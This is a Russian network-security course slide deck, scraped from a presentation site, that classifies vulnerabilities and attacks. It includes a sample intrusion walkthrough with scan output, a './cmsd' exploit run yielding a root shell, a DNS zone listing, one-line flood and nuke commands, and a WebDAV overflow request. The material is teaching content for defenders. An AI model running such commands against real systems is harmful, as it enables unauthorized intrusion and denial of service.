Что такое findslide.org?

FindSlide.org - это сайт презентаций, докладов, шаблонов в формате PowerPoint.


Для правообладателей

Обратная связь

Email: Нажмите что бы посмотреть 

Яндекс.Метрика

Презентация на тему Уязвимости и атаки. БЕЗОПАСНОСТЬ КОМПЬТЕРНЫХ СЕТЕЙ (Курс БТ03)

Содержание

Разделы курса:Раздел 1. Основы безопасности сетевых технологийРаздел 2. Безопасность уровня сетевого взаимодействия Раздел 3. Безопасность уровня операционных систем (узлов)Раздел 4. Основы безопасности СУБДРаздел 5. Основы безопасности приложений У Ч Е Б Н Ы Й
БЕЗОПАСНОСТЬ  КОМПЬТЕРНЫХ СЕТЕЙКурс БТ03У Ч Е Б Н Ы Й Ц Е Н Т РИНФОРМЗАЩИТА Разделы курса:Раздел 1. Основы безопасности сетевых технологийРаздел 2. Безопасность уровня сетевого ОСНОВЫ БЕЗОПАСНОСТИ  СЕТЕВЫХ ТЕХНОЛОГИЙУ Ч Е Б Н Ы Й Ц У Ч Е Б Н Ы Й Ц Е Н Т РИНФОРМЗАЩИТАРассматриваемые Типовая корпоративная сетьРаздел 1 – Тема 1 Типовая корпоративная сетьВнутренние серверыРабочие местаМЭ Уровни информационной инфраструктуры Уровни информационной инфраструктурыTCP/IPNetBEUIIPX/SPX Уровни информационной инфраструктуры Уровни информационной инфраструктуры Уровни информационной инфраструктурыOffice 2000 Уровни информационной инфраструктуры Уровень сети - особенностиВнутренние серверыРабочие местаМЭ Интеграция разнородных   компонентов в Основные понятия информационной безопасности. Уязвимости и атакиРаздел 1 – Тема 2 У Ч Е Б Н Ы Й Ц Е Н Т РИНФОРМЗАЩИТАДоступность У Ч Е Б Н Ы Й Ц Е Н Т РИНФОРМЗАЩИТА У Ч Е Б Н Ы Й Ц Е Н Т РИНФОРМЗАЩИТАЦелостность У Ч Е Б Н Ы Й Ц Е Н Т РИНФОРМЗАЩИТА У Ч Е Б Н Ы Й Ц Е Н Т РИНФОРМЗАЩИТАКонфиденциальность Атака – прослушивание трафикаПример нарушения конфиденциальности У Ч Е Б Н Ы Й Ц Е Н Т РИНФОРМЗАЩИТА При обмене данными существует угроза их перехватаУязвимость, приводящая к реализации угрозы, Примерный сценарий атакиСбор информацииАнализ и переработка собранных сведений, выбор целей атакиРеализация атакиПоиск Сбор информации Из общедоступных источников ACMETRADE.COM Registrant:Acmetrade.com, Inc. (ACMETRADE-DOM)  6600 Peachtree Dunwoody Road  Atlanta, GA 30338 Информация из базы DNS-сервера Информация из базы DNS-сервера [hacker@linux131 hacker]$ nmap 200.0.0.143Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )Interesting hacker:/export/home/hacker>./rpcscan dns.acmetrade.com cmsdScanning dns.acmetrade.com for program 100068cmsd is on port 33505hacker:/export/home/hacker> UNIXFirewallDNS ServerWeb ServerFiltering RouterNTClients & WorkstationsNetworkUNIXNTUNIXАнализ трафика (Схема сети)UNIXFirewallDNS ServerWeb ServerFiltering RouterNTClients & WorkstationsNetworkUNIXNTUNIXАнализ и переработка собранных сведений Поиск инструментов Поиск инструментов hacker:/export/home/hacker>iduid=1002(hacker) gid=10(staff)hacker:/export/home/hacker>uname -aSunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Enginehacker:/export/home/hacker>./cmsd dns.acmetrade.comusing source port ##nslookupDefault Server: dns.acmetrade.comAddress: 208.21.2.67>>ls acmetrade.comReceived 15 records.^D[dns.acmetrade.com]www.acmetrade.com			208.21.2.10www1.acmetrade.com		208.21.2.12www2.acmetrade.com		208.21.2.103margin.acmetrade.com		208.21.4.10marketorder.acmetrade.com		208.21.2.62deriv.acmetrade.com		208.21.2.25deriv1.acmetrade.com		208.21.2.13bond.acmetrade.com		208.21.2.33ibd.acmetrade.com			208.21.2.27fideriv.acmetrade.com		208.21.4.42backoffice.acmetrade.com		208.21.4.45wiley.acmetrade.com		208.21.2.29bugs.acmetrade.com		208.21.2.89fw.acmetrade.com			208.21.2.94fw1.acmetrade.com			208.21.2.21Использование узла в качестве платформы для исследования других узлов сети Классификация уязвимостей узлов, протоколов  и служб IP - сетей Классификация уязвимостей  по причинам возникновенияошибки проектирования  (технологий, протоколов, служб) Классификация по уровню  в информационной инфраструктуреУровень сетиУровень операционной системыУровень баз данныхУровень персоналаУровень приложений Классификация уязвимостей  по уровню (степени) рискаВысокий уровень рискаСредний уровень рискаНизкий уровень Общедоступные базы данных уязвимостейwww.kb.cert.org/vuls/     -   координационный Примеры уязвимостейУровень:  СУБДОписание: переполнение буфера в реализации службы разрешения имён в http://cve.mitre.org/cveЕдиная система наименований для уязвимостейСтандартное описание для каждой уязвимостиОбеспечение совместимости баз данных уязвимостей http://cve.mitre.org/cveCAN-1999-0067CVE-1999-0067Кандидат CVEИндекс CVE Ситуация без CVEISS RealSecureCERT AdvisoryCisco DatabaseAxent NetReconland attack (spoofed SYN)Impossible IP PacketBugtragCA-97.28.Teardrop_LandLandNT4-SP3and Поддержка CVECVE-1999-0016 Land IP denial of serviceCVECERT AdvisoryBugtragISS RealSecureCisco DatabaseAxent NetRecon CVE entry (sql-slammer-worm)CAN-2002-0649 (under review) Multiple buffer overflows in SQL Server 2000 Жизненный цикл уязвимостиОбнаружение(ПубликацияОбсуждение)http://cve.mitre.org/cveАнализ(Классификация)Сохранение(появление обновлений для сканеров  уязвимостей)Защита(Рекомендации по защите)Обнаружение атак(настройка)Разбор инцидентов Классификация атак в IP- сетях Классификация атак  по целям Нарушение нормального функционирования объекта атаки (отказ в Классификация атак  по местонахождению атакующего и объекта атакиАтакующий и объект атаки Классификация атак по механизмам реализацииПассивное прослушивание Пассивное прослушиваниеDMZ-2DMZ-1Внутренние серверыМЭЧтение почты Классификация атак по механизмам реализацииПодозрительная активность (разведка)Пассивное прослушивание Определение ОС узлаВнутренние серверыРабочие местаМЭ# nmap –O –vv www.company.com Классификация атак по механизмам реализацииПодозрительная активность (разведка)Бесполезное расходование вычислительных ресурсов (перегрузка)Пассивное прослушивание ПерегрузкаВнутренние серверыРабочие местаМЭ# ./neptun www.company.com Классификация атак по механизмам реализацииПодозрительная активность (разведка)Бесполезное расходование вычислительных ресурсов (перегрузка)Нарушение навигации (ложный маршрут) Пассивное прослушивание Нарушение навигацииВнутренние серверыРабочие местаМЭDNSсервер Классификация атак по механизмам реализацииПровоцирование отказа объекта (компонента)Подозрительная активность (разведка)Бесполезное расходование вычислительных Провоцирование отказаВнутренние серверыРабочие местаМЭ# nuke www.company.com Классификация атак по механизмам реализацииПровоцирование отказа объекта (компонента)Подозрительная активность (разведка)Запуск кода (программы) Пример: уязвимость WebDAVВнутренние серверыРабочие местаМЭ# WebDAV www.company.com НТТР-запрос:SEARCH /xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx….. …xxxxx HTTP/1.1Host: 200.1.1.254Content-Type: Классификация атак по механизмам реализацииПровоцирование отказа объекта (компонента)Подозрительная активность (разведка)Запуск кода (программы) Top 20Уязвимости Windows-системW1 Internet Information Services (IIS) W2 Microsoft Data Access Components Top 20Уязвимости Unix-системU1 Remote Procedure Calls (RPC) U2 Apache Web Server U3
Слайды презентации

Слайд 2 Разделы курса:
Раздел 1. Основы безопасности сетевых технологий
Раздел 2.

Разделы курса:Раздел 1. Основы безопасности сетевых технологийРаздел 2. Безопасность уровня сетевого

Безопасность уровня сетевого взаимодействия Раздел 3. Безопасность уровня

операционных систем (узлов)
Раздел 4. Основы безопасности СУБД
Раздел 5. Основы безопасности приложений

У Ч Е Б Н Ы Й Ц Е Н Т Р
ИНФОРМЗАЩИТА


Слайд 3 ОСНОВЫ БЕЗОПАСНОСТИ СЕТЕВЫХ ТЕХНОЛОГИЙ
У Ч Е Б Н

ОСНОВЫ БЕЗОПАСНОСТИ СЕТЕВЫХ ТЕХНОЛОГИЙУ Ч Е Б Н Ы Й Ц Е Н Т РИНФОРМЗАЩИТАРаздел 1

Ы Й Ц Е Н Т Р
ИНФОРМЗАЩИТА
Раздел 1


Слайд 4 У Ч Е Б Н Ы Й Ц

У Ч Е Б Н Ы Й Ц Е Н Т

Е Н Т Р
ИНФОРМЗАЩИТА
Рассматриваемые темы
Тема 1. Типовая корпоративная сеть Тема

2. Основные понятия информационной безопасности. Уязвимости и атаки
Тема 3. Защитные механизмы и средства обеспечения безопасности


Слайд 5 Типовая корпоративная сеть
Раздел 1 – Тема 1

Типовая корпоративная сетьРаздел 1 – Тема 1

Слайд 6 Типовая корпоративная сеть




Внутренние серверы
Рабочие места
МЭ


Типовая корпоративная сетьВнутренние серверыРабочие местаМЭ

Слайд 7 Уровни информационной инфраструктуры

Уровни информационной инфраструктуры

Слайд 8 Уровни информационной инфраструктуры


TCP/IP
NetBEUI
IPX/SPX

Уровни информационной инфраструктурыTCP/IPNetBEUIIPX/SPX

Слайд 9 Уровни информационной инфраструктуры



Уровни информационной инфраструктуры

Слайд 10 Уровни информационной инфраструктуры



Уровни информационной инфраструктуры

Слайд 11 Уровни информационной инфраструктуры



Office 2000

Уровни информационной инфраструктурыOffice 2000

Слайд 12 Уровни информационной инфраструктуры


Уровни информационной инфраструктуры

Слайд 13 Уровень сети - особенности





Внутренние серверы
Рабочие места
МЭ
Интеграция разнородных

Уровень сети - особенностиВнутренние серверыРабочие местаМЭ Интеграция разнородных  компонентов в

компонентов в единую систему
Обеспечение дифференцированного качества обслуживания

Обеспечение безопасности при взаимодействии компонентов

Слайд 14 Основные понятия информационной безопасности. Уязвимости и атаки
Раздел 1

Основные понятия информационной безопасности. Уязвимости и атакиРаздел 1 – Тема 2

– Тема 2


Слайд 15 У Ч Е Б Н Ы Й Ц

У Ч Е Б Н Ы Й Ц Е Н Т

Е Н Т Р
ИНФОРМЗАЩИТА
Доступность информации - свойство системы (среды,

инфраструктуры), в которой циркулирует информация, характеризующееся способностью обеспечивать своевременный беспрепятственный доступ субъектов к интересующей их информации и готовность соответствующих автоматизированных служб к обработке поступающих от субъектов запросов.

Основные определения


Слайд 16 У Ч Е Б Н Ы Й Ц

У Ч Е Б Н Ы Й Ц Е Н Т

Е Н Т Р
ИНФОРМЗАЩИТА


Атака – WinNuke



Port =

139, OOB

Пример нарушения доступности


Слайд 17 У Ч Е Б Н Ы Й Ц

У Ч Е Б Н Ы Й Ц Е Н Т

Е Н Т Р
ИНФОРМЗАЩИТА
Целостность информации - свойство информации (системы

ее обработки), заключающееся в ее существовании в неискаженном виде (неизменном по отношению к некоторому фиксированному ее состоянию).

Основные определения


Слайд 18 У Ч Е Б Н Ы Й Ц

У Ч Е Б Н Ы Й Ц Е Н Т

Е Н Т Р
ИНФОРМЗАЩИТА


Атака – троянский конь




Пример нарушения целостности


Слайд 19 У Ч Е Б Н Ы Й Ц

У Ч Е Б Н Ы Й Ц Е Н Т

Е Н Т Р
ИНФОРМЗАЩИТА
Конфиденциальность информации - субъективно определяемая (приписываемая)

характеристика (свойство) информации, указывающая на необходимость введения ограничений на круг субъектов, имеющих доступ к данной информации, и обеспечиваемая способностью системы (среды) сохранять указанную информацию в тайне от субъектов, не имеющих полномочий на доступ к ней.

Основные определения


Слайд 20



Атака – прослушивание трафика

Пример нарушения конфиденциальности

Атака – прослушивание трафикаПример нарушения конфиденциальности

Слайд 21 У Ч Е Б Н Ы Й Ц

У Ч Е Б Н Ы Й Ц Е Н Т

Е Н Т Р
ИНФОРМЗАЩИТА


Атака - действие нарушителя, которое

приводит к реализации угрозы путем использования уязвимостей информационной системы.

Угроза - потенциально возможное событие, явление или процесс, которое воздействуя на компоненты информационной системы может привести к нанесению ущерба.

Уязвимость - любая характеристика или свойство информационной системы, использование которой нарушителем может привести к реализации угрозы.


Угрозы, уязвимости и атаки


Слайд 22


При обмене данными существует угроза их перехвата
Уязвимость,

При обмене данными существует угроза их перехватаУязвимость, приводящая к реализации

приводящая к реализации угрозы, - особенность технологии «Ethernet» -

общая среда передачи

Атака, использующая уязвимость – запуск сетевого анализатора

Взаимосвязь определений


Слайд 23 Примерный сценарий атаки
Сбор информации
Анализ и переработка собранных сведений,

Примерный сценарий атакиСбор информацииАнализ и переработка собранных сведений, выбор целей атакиРеализация

выбор целей атаки
Реализация атаки
Поиск инструментов для использования предполагаемых уязвимостей


Слайд 24 Сбор информации

Сбор информации

Слайд 25 Из общедоступных
источников

Из общедоступных источников

Слайд 26 ACMETRADE.COM

ACMETRADE.COM

Слайд 27 Registrant:
Acmetrade.com, Inc. (ACMETRADE-DOM)
6600 Peachtree Dunwoody Road

Registrant:Acmetrade.com, Inc. (ACMETRADE-DOM) 6600 Peachtree Dunwoody Road Atlanta, GA 30338 Domain

Atlanta, GA 30338

Domain Name: ACMETRADE.COM

Administrative Contact:
Vaughn, Danon (ES2394) dvaughn@ACMETRADE.COM
(678)443-6000 (FAX) (678) 443-6476
Technical Contact, Zone Contact:
Bergman, Bret (ET2324) bbergman@ACMETRADE.COM
(678)443-6100 (FAX) (678) 443-6208
Billing Contact:
Fields, Hope (ET3427) hfields@ACMETRADE.COM
(678)443-6101 (FAX) (678) 443-6401

Record Last updated on 27-Jul-99.
Record created on 06-Mar-98.
Database last updated on 4-Oct-99 09:09:01 EDT

Domain servers in listed order:

dns.acmetrade.com 208.21.2.67
www.acmetrade.com 208.21.2.10
www1.acmetrade.com 208.21.2.12
www2.acmetrade.com 208.21.2.103

http://www.networksolutions.com/cgi-bin/whois/whois/?STRING=acmetrade.com



Слайд 29 Информация из базы DNS-сервера

Информация из базы DNS-сервера

Слайд 30
Информация из базы DNS-сервера

Информация из базы DNS-сервера

Слайд 31 [hacker@linux131 hacker]$ nmap 200.0.0.143

Starting nmap V. 2.53 by

[hacker@linux131 hacker]$ nmap 200.0.0.143Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/

fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on (200.0.0.143):
(The 1516 ports

scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open loc-srv
139/tcp open netbios-ssn
443/tcp open https
465/tcp open smtps

Nmap run completed -- 1 IP address (1 host up) scanned in 1 second
[hacker@linux131 hacker]$

Сканирование портов, идентификация служб и ОС


Слайд 32
hacker:/export/home/hacker>
./rpcscan dns.acmetrade.com cmsd
Scanning dns.acmetrade.com for program 100068
cmsd is

hacker:/export/home/hacker>./rpcscan dns.acmetrade.com cmsdScanning dns.acmetrade.com for program 100068cmsd is on port 33505hacker:/export/home/hacker>

on port 33505
hacker:/export/home/hacker>


Слайд 33 UNIX
Firewall
DNS Server
Web Server
Filtering Router
NT
Clients & Workstations
Network
UNIX
NT
UNIX
Анализ трафика

UNIXFirewallDNS ServerWeb ServerFiltering RouterNTClients & WorkstationsNetworkUNIXNTUNIXАнализ трафика

Слайд 34
(Схема сети)
UNIX
Firewall
DNS Server
Web Server
Filtering Router
NT
Clients & Workstations
Network
UNIX
NT
UNIX
Анализ и

(Схема сети)UNIXFirewallDNS ServerWeb ServerFiltering RouterNTClients & WorkstationsNetworkUNIXNTUNIXАнализ и переработка собранных сведений

переработка собранных сведений


Слайд 35 Поиск инструментов

Поиск инструментов

Слайд 36
Поиск инструментов

Поиск инструментов

Слайд 37
hacker:/export/home/hacker>
id
uid=1002(hacker) gid=10(staff)
hacker:/export/home/hacker>
uname -a
SunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc

hacker:/export/home/hacker>iduid=1002(hacker) gid=10(staff)hacker:/export/home/hacker>uname -aSunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Enginehacker:/export/home/hacker>./cmsd dns.acmetrade.comusing source

SUNW,UltraSPARC-IIi-Engine
hacker:/export/home/hacker>
./cmsd dns.acmetrade.com
using source port 53
rtable_create worked
Exploit successful. Portshell created

on port 33505

hacker:/export/home/hacker>

Trying 208.21.2.67...
Connected to dns.acmetrade.com.
Escape character is '^]'.

#

id

uid=0(root) gid=0(root)

#

uname -a

SunOS dns 5.5.1 Generic_103640-24 sun4m sparc SUNW,SPARCstation-5

#

telnet dns.acmetrade.com 33505

Реализация атаки


Слайд 38
#
#
nslookup
Default Server: dns.acmetrade.com
Address: 208.21.2.67
>
>
ls acmetrade.com
Received 15 records.
^D
[dns.acmetrade.com]
www.acmetrade.com 208.21.2.10
www1.acmetrade.com 208.21.2.12
www2.acmetrade.com 208.21.2.103
margin.acmetrade.com 208.21.4.10
marketorder.acmetrade.com 208.21.2.62
deriv.acmetrade.com 208.21.2.25
deriv1.acmetrade.com 208.21.2.13
bond.acmetrade.com 208.21.2.33
ibd.acmetrade.com 208.21.2.27
fideriv.acmetrade.com 208.21.4.42
backoffice.acmetrade.com 208.21.4.45
wiley.acmetrade.com 208.21.2.29
bugs.acmetrade.com 208.21.2.89
fw.acmetrade.com 208.21.2.94
fw1.acmetrade.com 208.21.2.21
Использование узла

##nslookupDefault Server: dns.acmetrade.comAddress: 208.21.2.67>>ls acmetrade.comReceived 15 records.^D[dns.acmetrade.com]www.acmetrade.com			208.21.2.10www1.acmetrade.com		208.21.2.12www2.acmetrade.com		208.21.2.103margin.acmetrade.com		208.21.4.10marketorder.acmetrade.com		208.21.2.62deriv.acmetrade.com		208.21.2.25deriv1.acmetrade.com		208.21.2.13bond.acmetrade.com		208.21.2.33ibd.acmetrade.com			208.21.2.27fideriv.acmetrade.com		208.21.4.42backoffice.acmetrade.com		208.21.4.45wiley.acmetrade.com		208.21.2.29bugs.acmetrade.com		208.21.2.89fw.acmetrade.com			208.21.2.94fw1.acmetrade.com			208.21.2.21Использование узла в качестве платформы для исследования других узлов сети

в качестве платформы для исследования других узлов сети


Слайд 39 Классификация уязвимостей
узлов, протоколов и служб IP - сетей

Классификация уязвимостей узлов, протоколов и служб IP - сетей

Слайд 40 Классификация уязвимостей по причинам возникновения
ошибки проектирования (технологий, протоколов,

Классификация уязвимостей по причинам возникновенияошибки проектирования (технологий, протоколов, служб) ошибки реализации

служб)
ошибки реализации (программ)
ошибки эксплуатации (неправильная настройка, неиспользуемые сетевые службы, слабые

пароли)

Слайд 41 Классификация по уровню в информационной инфраструктуре
Уровень сети
Уровень операционной

Классификация по уровню в информационной инфраструктуреУровень сетиУровень операционной системыУровень баз данныхУровень персоналаУровень приложений

системы
Уровень баз данных
Уровень персонала
Уровень приложений


Слайд 42 Классификация уязвимостей по уровню (степени) риска
Высокий уровень риска
Средний

Классификация уязвимостей по уровню (степени) рискаВысокий уровень рискаСредний уровень рискаНизкий уровень

уровень риска
Низкий уровень риска
Уязвимости, позволяющие атакующему сразу получить доступ

у узлу с правами суперпользователя

Уязвимости, позволяющие атакующему получить доступ к информации, которая с высокой степенью вероятности позволит впоследствии получить доступ к узлу

Уязвимости, позволяющие злоумышленнику осуществлять сбор критичной информации о системе






Слайд 43 Общедоступные базы данных уязвимостей
www.kb.cert.org/vuls/

Общедоступные базы данных уязвимостейwww.kb.cert.org/vuls/   -  координационный

- координационный

центр CERT/CC

www.iss.net/security_center/search.php - база данных компании ISS

www.ciac.org/ciac/ - центр CIAC

www.securityfocus.com/bid

www.sans.org


Слайд 44 Примеры уязвимостей
Уровень: СУБД
Описание: переполнение буфера в реализации

Примеры уязвимостейУровень: СУБДОписание: переполнение буфера в реализации службы разрешения имён в

службы разрешения имён в СУБД Microsoft SQL Server может

привести к «отказу в обслуживании» или к запуску произвольного кода путём посылки специальным образом построенных UDP-пакетов на порт 1434.

Степень риска: высокая

Источник возникновения: ошибки реализации

CVE: CAN-2002-0649


Слайд 45 http://cve.mitre.org/cve
Единая система наименований для уязвимостей
Стандартное описание для каждой

http://cve.mitre.org/cveЕдиная система наименований для уязвимостейСтандартное описание для каждой уязвимостиОбеспечение совместимости баз данных уязвимостей

уязвимости
Обеспечение совместимости баз данных уязвимостей


Слайд 46 http://cve.mitre.org/cve
CAN-1999-0067

CVE-1999-0067
Кандидат CVE
Индекс CVE


http://cve.mitre.org/cveCAN-1999-0067CVE-1999-0067Кандидат CVEИндекс CVE

Слайд 47 Ситуация без CVE
ISS RealSecure
CERT Advisory
Cisco Database
Axent NetRecon
land attack

Ситуация без CVEISS RealSecureCERT AdvisoryCisco DatabaseAxent NetReconland attack (spoofed SYN)Impossible IP

(spoofed SYN)


Impossible IP Packet
Bugtrag
CA-97.28.Teardrop_Land
Land
NT4-SP3and 95 [latierra.c]



Уязвимость Land IP denial

of service

Слайд 48 Поддержка CVE
CVE-1999-0016 Land IP denial of service
CVE
CERT Advisory
Bugtrag


ISS

Поддержка CVECVE-1999-0016 Land IP denial of serviceCVECERT AdvisoryBugtragISS RealSecureCisco DatabaseAxent NetRecon

RealSecure
Cisco Database
Axent NetRecon




Слайд 49 CVE entry (sql-slammer-worm)
CAN-2002-0649 (under review)

Multiple buffer overflows

CVE entry (sql-slammer-worm)CAN-2002-0649 (under review) Multiple buffer overflows in SQL Server

in SQL Server 2000 Resolution Service allow remote attackers

to cause a denial of service or execute arbitrary code via UDP packets to port 1434 in which (1) a 0x04 byte causes the SQL Monitor thread to generate a long registry key name, or (2) a 0x08 byte with a long string causes heap corruption. .

BUGTRAQ:20020725 Microsoft SQL Server 2000 Unauthenticated System Compromise (#NISR25072002)
URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102760196931518&w=2
NTBUGTRAQ:20020725 Microsoft SQL Server 2000 Unauthenticated System Compromise (#NISR25072002)
URL:http://marc.theaimsgroup.com/?l=ntbugtraq&m=102760479902411&w=2
MS:MS02-039
URL:http://www.microsoft.com/technet/security/bulletin/ms02-039.asp

Номер

Описание

Ссылки


Слайд 50 Жизненный цикл уязвимости
Обнаружение
(Публикация
Обсуждение)
http://cve.mitre.org/cve
Анализ
(Классификация)
Сохранение
(появление обновлений для сканеров уязвимостей)
Защита
(Рекомендации по

Жизненный цикл уязвимостиОбнаружение(ПубликацияОбсуждение)http://cve.mitre.org/cveАнализ(Классификация)Сохранение(появление обновлений для сканеров уязвимостей)Защита(Рекомендации по защите)Обнаружение атак(настройка)Разбор инцидентов

защите)
Обнаружение атак
(настройка)
Разбор инцидентов


Слайд 51
Классификация атак в IP- сетях

Классификация атак в IP- сетях

Слайд 52 Классификация атак по целям
Нарушение нормального функционирования
объекта

Классификация атак по целям Нарушение нормального функционирования объекта атаки (отказ в

атаки (отказ в обслуживании)
Получение конфиденциальной информации
Модификация или

фальсификация
критичных данных

Получение полного контроля над
объектом атаки


Слайд 53 Классификация атак по местонахождению атакующего и объекта атаки
Атакующий

Классификация атак по местонахождению атакующего и объекта атакиАтакующий и объект атаки

и объект атаки находятся в одном сегменте
Атакующий и объект

атаки находятся в разных сегментах

Маршру-тизатор


Слайд 54 Классификация атак по механизмам реализации
Пассивное прослушивание

Классификация атак по механизмам реализацииПассивное прослушивание

Слайд 55 Пассивное прослушивание






DMZ-2
DMZ-1
Внутренние серверы
МЭ










Чтение почты

Пассивное прослушиваниеDMZ-2DMZ-1Внутренние серверыМЭЧтение почты

Слайд 56 Классификация атак по механизмам реализации
Подозрительная активность (разведка)
Пассивное прослушивание

Классификация атак по механизмам реализацииПодозрительная активность (разведка)Пассивное прослушивание

Слайд 57 Определение ОС узла




Внутренние серверы
Рабочие места
МЭ
# nmap –O –vv

Определение ОС узлаВнутренние серверыРабочие местаМЭ# nmap –O –vv www.company.com

www.company.com


Слайд 58 Классификация атак по механизмам реализации
Подозрительная активность (разведка)
Бесполезное расходование

Классификация атак по механизмам реализацииПодозрительная активность (разведка)Бесполезное расходование вычислительных ресурсов (перегрузка)Пассивное прослушивание

вычислительных ресурсов (перегрузка)
Пассивное прослушивание


Слайд 59 Перегрузка




Внутренние серверы
Рабочие места
МЭ
# ./neptun www.company.com




ПерегрузкаВнутренние серверыРабочие местаМЭ# ./neptun www.company.com

Слайд 60 Классификация атак по механизмам реализации
Подозрительная активность (разведка)
Бесполезное расходование

Классификация атак по механизмам реализацииПодозрительная активность (разведка)Бесполезное расходование вычислительных ресурсов (перегрузка)Нарушение навигации (ложный маршрут) Пассивное прослушивание

вычислительных ресурсов (перегрузка)
Нарушение навигации (ложный маршрут)
Пассивное прослушивание


Слайд 61 Нарушение навигации




Внутренние серверы
Рабочие места
МЭ
DNS
сервер



Нарушение навигацииВнутренние серверыРабочие местаМЭDNSсервер

Слайд 62 Классификация атак по механизмам реализации
Провоцирование отказа объекта (компонента)
Подозрительная

Классификация атак по механизмам реализацииПровоцирование отказа объекта (компонента)Подозрительная активность (разведка)Бесполезное расходование

активность (разведка)
Бесполезное расходование вычислительных ресурсов (перегрузка)
Нарушение навигации (ложный маршрут)


Пассивное прослушивание


Слайд 63 Провоцирование отказа




Внутренние серверы
Рабочие места
МЭ
# nuke www.company.com

Провоцирование отказаВнутренние серверыРабочие местаМЭ# nuke www.company.com

Слайд 64 Классификация атак по механизмам реализации
Провоцирование отказа объекта (компонента)
Подозрительная

Классификация атак по механизмам реализацииПровоцирование отказа объекта (компонента)Подозрительная активность (разведка)Запуск кода

активность (разведка)
Запуск кода (программы) на объекте атаки
Бесполезное расходование вычислительных

ресурсов (перегрузка)

Нарушение навигации (ложный маршрут)

Пассивное прослушивание


Слайд 65 Пример: уязвимость WebDAV




Внутренние серверы
Рабочие места
МЭ
# WebDAV www.company.com

НТТР-запрос:

SEARCH

Пример: уязвимость WebDAVВнутренние серверыРабочие местаМЭ# WebDAV www.company.com НТТР-запрос:SEARCH /xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx….. …xxxxx HTTP/1.1Host:

/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx….. …xxxxx HTTP/1.1
Host: 200.1.1.254
Content-Type: text/xml
Content-Length: 137




Select "DAV:displayname"

from scope()



Слайд 66 Классификация атак по механизмам реализации
Провоцирование отказа объекта (компонента)
Подозрительная

Классификация атак по механизмам реализацииПровоцирование отказа объекта (компонента)Подозрительная активность (разведка)Запуск кода

активность (разведка)
Запуск кода (программы) на объекте атаки
Бесполезное расходование вычислительных

ресурсов (перегрузка)

Нарушение навигации (ложный маршрут)

Пассивное прослушивание


Слайд 67 Top 20
Уязвимости Windows-систем
W1 Internet Information Services (IIS)
W2

Top 20Уязвимости Windows-системW1 Internet Information Services (IIS) W2 Microsoft Data Access

Microsoft Data Access Components (MDAC) -- Remote Data Services


W3 Microsoft SQL Server
W4 NETBIOS -- Unprotected Windows Networking Shares
W5 Anonymous Logon -- Null Sessions
W6 LAN Manager Authentication -- Weak LM Hashing
W7 General Windows Authentication -- Accounts with No Passwords or Weak Passwords
W8 Internet Explorer
W9 Remote Registry Access
W10 Windows Scripting Host

http://www.sans.org/top20


  • Имя файла: uyazvimosti-i-ataki-bezopasnost-kompternyh-setey-kurs-bt03.pptx
  • Количество просмотров: 186
  • Количество скачиваний: 3
- Предыдущая Ставни и наличники
Следующая - Теории власти